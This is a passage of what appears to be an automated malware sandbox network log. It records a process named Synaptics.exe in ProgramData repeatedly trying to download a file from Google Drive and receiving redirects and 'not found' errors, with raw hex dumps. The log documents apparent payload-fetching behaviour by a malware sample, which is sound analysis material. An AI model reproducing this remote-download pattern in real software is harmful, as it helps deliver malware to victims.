                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    97192.168.2.449891142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:36 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:36 UTC1242INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6sEKpj7K2JTFM2i5m0S7mYHMXxHbY36vpIt1vd315tHLee4YA71LlDnZupTa_o8C0
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:36 GMT
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-InuDqAYtm78iwzwKmEjFOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:36 UTC148INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not
                                                                                                                                                                    2024-12-30 03:59:36 UTC1390INData Raw: 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 4a 77 34 74 43 62 71 39 68 43 66 71 61 36 4e 32 32 54 64 6f 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a
                                                                                                                                                                    Data Ascii: Found)!!1</title><style nonce="3Jw4tCbq9hCfqa6N22TdoQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:
                                                                                                                                                                    2024-12-30 03:59:36 UTC114INData Raw: 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    98192.168.2.449892142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:36 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:36 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-u5sY0NXiRWoFp25zcoRHrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    99192.168.2.449894142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:36 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:36 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4WHAfbb6IRukLwpSyevePuFa4_SwhQJjEJNRHx1Q3Kri0GfJRN-pdJ1paAks6hZvA2f4n-uQk
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:36 GMT
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-HXdeOlWWtJ0GBordlk7n-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:36 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:36 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 49 36 37 67 39 39 2d 73 78 41 4c 31 50 37 48 43 4f 71 47 35 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="II67g99-sxAL1P7HCOqG5w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:36 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    100192.168.2.449893142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:36 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:36 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-EzetUvTvHiJHylEZPmqdtQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    101192.168.2.449898142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:37 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:37 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4KS1-8RPzB0Lv_c7iLtGFjZmcKJK3jBAYNptdA-urt_pRg2CNGOwwelOHjaa4LRS7W
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:37 GMT
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-zQZnxz-jdoHytkoMnTSKRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:37 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:37 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 73 45 67 77 67 42 43 56 45 5f 7a 61 50 2d 62 37 30 42 74 6e 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="QsEgwgBCVE_zaP-b70BtnQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:37 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    102192.168.2.449899142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:37 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:37 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-vEm_S7qu6vMgkV9vCxj1Lg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    103192.168.2.449897142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:37 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:37 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-FyvgMTGBGFSbJ1ZykSr4aQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
